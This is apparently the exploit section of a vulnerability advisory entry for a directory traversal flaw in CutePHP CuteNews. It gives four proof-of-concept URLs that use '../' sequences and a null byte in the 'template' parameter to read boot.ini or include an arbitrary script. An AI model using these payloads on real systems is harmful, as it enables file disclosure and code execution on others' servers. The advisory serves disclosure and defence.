• info
• discussion
• exploit
• solution
• references

CutePHP CuteNews Directory Traversal Vulnerability

An exploit is not required.

The following proof of concept examples are available:
http://www.example.com/cute141/show_archives.php?template=../../../../../../../../boot.ini%00
http://www.example.com/cute141/show_archives.php?template=../../../../../../../../[script]
http://www.example.com/cute141/show_news.php?template=../../../../../../../../boot.ini%00
http://www.example.com/cute141/show_news.php?template=../../../../../../../../[script]